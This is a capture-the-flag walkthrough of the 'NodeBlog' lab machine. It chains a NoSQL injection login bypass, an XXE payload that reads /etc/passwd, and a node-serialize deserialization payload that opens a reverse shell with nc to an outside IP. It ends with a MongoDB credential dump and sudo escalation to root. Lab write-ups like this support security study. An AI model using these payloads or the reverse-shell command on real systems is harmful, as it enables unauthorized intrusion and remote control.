Nodeblog

NodeBlog is an Easy Difficulty Linux machine. Initial exploitation relies on a NoSQL authentication bypass, enabling unauthenticated access to sensitive areas of the application. Following this, the box introduces a File Upload feature vulnerable to XML External Entity ( XXE ) attacks, which is leveraged to leak files, including the source code of the application. Analyzing the entry point in the source we code a deserialization vulnerability is identified, which can be exploited for remote code execution ( RCE ). Subsequently, the machine's user password is extracted from a MongoDB shell, which leads to root privileges on the machine.

Reconaissance

nmap

As usual starting by scanning all the open ports and running services using nmap

let's browse to the nodejs web application in port 5000

and we see a login page, directory enumeration or virtual host fuzzing will not give any results so the only way that we have to take is to bypass the login page

if we enter invalid credentials we get invalid username so we can enumerate valid usernames

if we enter admin as the username and a random password we get invalid password so admin is a valid username

testing for sqli will not make us bypass the login page

nodejs applications often uses nosql databases because it fits more with javascript so we can try to bypass the login using nosql injection payloads

let's intercept the request using burp and send it to repeater to try a couple of payloads that exist on payloadAllTheThings

to inject nosql payloads we have to change the content type to application/json

{"user": "admin", "password": {"$gt": ""}}

and we are in (we get a cookie in the response)

if we decode the cookie as URL we get this

let click right on the response and click on show the response in browser and copy the link now browse using this link

but before doing anything we can do something benificial which is a useful file disclosure

if we send a bad json in the login request we get the web application source code location in the system

now let's return to the application

the upload functionnality accepts xml files so let's try to do XXE Injection

let's create a xml file that contains only text and intercept the request using burp

so they gave us an exmple of xml that we have to send

let's craft this xml to leak some files from the target system

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<post>
	<title>Example Post</title>
	<description>&xxe;</description>
	<markdown>Exemple Markdown</markdown>
</post>

Foothold

RCE through Node Deserialization Attack

we know the directory where the application source code is stored /opt/blog and in nodejs applications the entry point is usually either main.js, index.js or server.js

after testing all of those the entry point is in /opt/blog/server.js

after reading the source code we can see that it uses node-serialize library which is vulnerable to a deserialization vulnerability

Untrusted data (cookie in this case) passed into unserialize() function in node-serialize module can be exploited to achieve arbitrary code execution by passing a serialized JavaScript Object with an Immediately invoked function expression (IIFE).

so we can pass in the cookie a serialized javascript object with an Immediately invoked function expression (IIFE) to get RCE.

to understand how you can exploit this vulnerability visit this link :

Node.js Deserialization Attack | Exploit Noteshideckies

this is the exploit we are going to use get RCE

{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.177 1234 >/tmp/f',function(error, stdout, stderr) { console.log(stdout) });}()"}

we will put this in the cookie and encode it as URL

before sending the request setup a listener on the port you have specified in the exploit

let's copy the url encoded exploit and paste it in the cookie

before we send it let's setup a listener at port 1234

encode it as url

send the request and we get a reverse shell as admin

Upgrading dumb shell :

you can view the user.txt flag at /home/admin

Privilege Escalation

Enumeration

let's explore the sudo rights of the user admin, unfortuanately we need the admin password

now if we look at the processes running in the target machine we will find mongo database running as a service

so let's try to access the mongo database locally using the command mongo

showing all databases using the command show dbs

Of the listed ones, the only non-default one is blog , which we proceed to enumerate

in mongodb databases contains collections

We find two collections, the latter of which, namely users is of primary interest as it might contain credentials. We proceed to dump its contents

so the admin's password is IppsecSaysPleaseSubscribe

so let's use sudo to become root because we have full sudo privileges

hope you found this walkthrough easy to understand and follow

Greeting From Sayonara